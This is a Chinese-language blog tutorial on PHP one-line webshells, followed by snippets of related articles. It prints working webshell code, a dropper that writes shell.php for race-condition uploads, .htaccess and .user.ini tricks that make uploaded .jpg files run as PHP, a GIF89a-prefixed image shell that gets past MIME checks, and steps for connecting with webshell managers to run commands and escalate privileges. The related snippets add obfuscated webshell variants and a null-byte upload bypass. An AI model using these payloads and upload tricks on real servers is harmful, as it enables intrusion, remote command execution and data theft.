你真的了解一句话木马吗?

已于 2023-05-22 20:17:18 修改
阅读量2w 收藏 165
点赞数 35
分类专栏: web安全 渗透提权 文章标签: php 开发语言 web安全
于 2023-04-14 18:37:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Elite__zhb/article/details/130157882
版权

目录

一、前言:

二、什么是一句话木马:

三、常见的一句话木马:

木马讲解:

1、$_POST[cmd]

2、eval()

3、"@"

4、脉络梳理

四、可用于条件竞争的一句话木马:

木马讲解:

1、fopen()

2、fputs()

 3、脉络梳理

五、图片马

1、什么是图片马:

2、.htaccess

3、木马图片

4.   .user.ini扩展

六、一句话木马进一步利用

1、连接

2、利用

一、前言:

  一句话木马是大多网安人在初步学习中,就遇到的一种简单的木马文件,相信很多人都像博主一样在接触到这一段代码时,都会感到非常的神奇,通过这样一段代码就能控制服务器,但却不知道其中的原理,在学习PHP之后才明白其构成,今天博主就带大家浅析一下一句话木马,也算是朝花夕拾吧,感兴趣的可以访问下我的博客http://blog.byzhb.top/

二、什么是一句话木马:

  一句话木马是一种短小精悍的恶意代码,通常只有一行之长。这种木马可以利用一些漏洞,以上传文件、修改配置等方式将恶意代码植入到受害者服务器上,然后通过一些特殊手法在服务器端执行,以达到入侵控制目的。攻击者可以使用一句话木马来窃取网站的敏感信息、篡改网站内容、攻击其他网站、制造破坏等。由于一句话木马具有体积小、隐蔽性强等特点,在黑客攻击中非常常见。

三、常见的一句话木马:

我们接触的一句话木马大多为这种,该木马使用了PHP语言,需要在有PHP环境的站点中才可使用

<?php @eval($_POST[cmd]);  ?>

木马讲解:

1、$_POST[cmd]

$_POST 是 PHP 中的一个超全局变量,我们在浏览器中POST方式提交的所有变量,都会保存在此数组中,变量名即为键名

2、eval()

eval() 函数在 PHP 中用于执行字符串中的代码并返回执行结果。该函数接受一个字符串作为参数,该字符串包含要执行的 PHP 代码(在此代码中为$_POST[cmd]),然后执行该代码,并且可以返回结果

该函数对php语法要求严格,所传入语句必须以" ; "号结尾

3、"@"

符号"@"的作用是 屏蔽该语句的报错信息,也就是所即使该语句执行错误也不会显示报错信息,如果站点PHP版本>=8.0的话,访问不带"@"的一句话木马会显示如下:

 原因是:php自8.0版本之后会对使用未定义的变量进行报错

我们初步访问此木马时并没有对其变量传值,固然会报错

4、脉络梳理

该木马的大体意思为,用eval函数,将我们post方式提交的名为cmd的变量,当做PHP代码执行,cmd变量可为任何攻击代码

四、可用于条件竞争的一句话木马:

关于什么是条件竞争请看博主的这篇文章http://t.csdn.cn/RFAgE

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);  ?>' ); ?>

木马讲解:

1、fopen()

该函数的格式为 fopen(filename,mode,include_path,context)

fopen('shell.php','w')

该语句的意思为,以写入方式打开一个叫做“ shell.php ”,的文件,该文件不存在,故创建了一个shell.php文件

2、fputs()

该函数格式为  fputs(file,string,length)

fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);  ?>' )

file参数对应   fopen('shell.php','w') 语句生成的shell.php文件

string参数对应   '<?php @eval($_POST[cmd]);  ?>'  这条字符串

也就是说把木马语句写入到了shell.php中

 3、脉络梳理

该函数首先借用fopen函数w方式,创建了shell.php文件,然后用fputs函数'<?php @eval($_POST[cmd]);  ?>'  写入了该文件

换而言之,一旦访问该文件,就会生成一个名为shell.php的一句话木马,木马的内容在上文已讲过

五、图片马

1、什么是图片马:

在站点禁止上传php文件时,我们可以将含有一句话木马的jpg(也可以是其他img格式)图片,配合.htaccess文件,将其解析成php文件

2、.htaccess

该配置文件仅Apache服务器可用

文件内容为

<FilesMatch "jpg">  
SetHandler application/x-httpd-php
</FilesMatch>
//大体意思是设置当前目录所有带jpg的文件名都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。不符合规则,则报错

然后命名为  .htaccess  并上传

3、木马图片

文件内容为

GIF89a
<?php @eval($_POST[cmd]);  ?>

//GIF89a 为了绕过可能存在的MIME头检测

然后命名为 shell.jpg 并上传,上传后访问其路径便可以传参

4.   .user.ini扩展

文件内容为

auto_prepend_file=shell.jpg

//意思就是当前目录中的php文件的页头会自动去包含shell.jpg中的文件内容
auto_append_file 是页尾包含

文件名为  .user.ini

操作步骤和 .htaccess相似

六、一句话木马进一步利用

我们可以通过蚁剑、菜刀、冰蝎等webshell工具,来更加彻底的利用一句话木马,这里以蚁剑为例

1、连接

url地址为 站点url+木马上传路径

连接密码为 shell.php中POST的变量名

2、利用

在连接成功后,便可以遍历网站服务器目录,执行命令操作,或进行进行一步提权操作

一句话木马原理与实战
V
07-30 3551
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:    <?php @eval($_POST[value]);?>    aspx一句话木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
php一句话木马连菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 2030
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
PHP一句话木马绕过技巧
最新发布
qq_45392044的博客
02-25 866
因此通过修改数据包,插入\0字符的形式,达到字符串截断的目的。此时我们的文件后缀为jpg,我们想要的时PHP,因此在第一行upload/后 + 1.php%00(php后跟%00,那么读取文件名时只会读取到.php,而不是.jpg,因此子就会被当成一个php文件来执行)在Apache解析顺序中,是从右到左开始解析文件后缀,如果最右侧后缀名不可识别,就继续往左判断,直到遇到可以解析的文件后缀为止,所以如果上传的文件名类似1.php.xxx,因为xxx不可解析,所以向左解析php
牛逼的一句话木码
Daoke37的博客
05-10 430
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
Web安全-一句话木马
热门推荐
道阻且长,行则将至
05-08 35万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
一句话木马的工作原理
liwei8703的专栏
11-19 7万+
<br />一句话木马的工作原理:一句话木马分析服务端与客户端。<br />"一句话木马"服务端(是用于本地的html提交脚本木马文件)<br />就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改<br />"一句话木马"客户端(远程服务器上被插入一句话的asp可执行文件)<br />用来向服务端
一句话木马的原理
ilovey4的专栏
05-28 948
一句话木马”服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改“一句话木马”客户端用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件一句话木马客户端源文件
一句话木马要点和防范注意事项
05-24
了解一句话木马的基本原理后,我们来谈谈防范措施: 1. **代码审计**:对网站源代码进行定期审查,查找并修复可能导致命令执行、文件包含等漏洞的代码片段。 2. **安全配置**:确保服务器软件和应用程序保持最新...
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
除了文件上传还有哪些方式可以写一句话木马
qq_51553814的博客
11-29 2487
除了文件上传还有哪些方式可以写一句话木马一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好 结合sql注入生成一句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2684
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
PHP一句话木马
Code-5的博客
04-17 3438
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
一句话木马
飞鱼计划
09-06 2万+
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...
一句话木马简介
qq_41272376的博客
02-15 7438
一句话木马简介 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
一句话木马原理
北冥有鱼
04-21 1万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request(“value”)%> 其中value...
一句话木马php的原理
01-04
### 一句话木马 PHP 的实现原理 #### 背景介绍 PHP作为一种广泛使用的服务器端脚本语言,在Web开发领域占据重要地位。然而,这种灵活性也使得恶意攻击者能够利用其特性创建所谓的“一句话木马”。这类程序通常极其简洁却功能强大,能够在目标服务器上执行任意命令。 #### 基础结构解析 最简单形式的一句话木马往往由两部分组成:接收外部输入的部分以及根据接收到的内容采取行动的部分。例如: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段会监听HTTP POST请求中的`cmd`参数,并尝试将其作为PHP代码执行[^1]。这意味着只要向该页面发送带有适当指令的POST请求,就能让服务器按照指示行事——无论是读取文件、修改数据库记录还是启动其他进程都不例外。 #### 数据传输方式 为了使上述机制生效,客户端需要通过特定的方式传递想要被执行的操作语句。常见的做法是在发起HTTP请求时附带必要的数据包。比如使用curl工具或浏览器插件构建自定义表单提交过程,其中包含触发条件和实际要运行的命令字符串[^4]。 #### 安全规避策略 随着安全防护措施日益严密,“传统”的一句话木马越来越难以逃过检测。因此出现了多种变种形态以增加隐蔽性和抗查杀能力。其中包括但不限于: - **编码混淆**:采用base64等算法对原始payload进行转换后再传入; - **逻辑拆分**:将完整的恶意代码分割成多个看似无害的小片段分别植入不同位置; - **环境感知**:加入判断逻辑确保只在满足某些前提条件下才激活恶意行为; 这些手段共同作用下可以让简单的几行代码变得异常复杂难辨,大大提高了入侵成功的几率同时也增加了事后追踪分析工作的难度[^3]。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Elitewa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值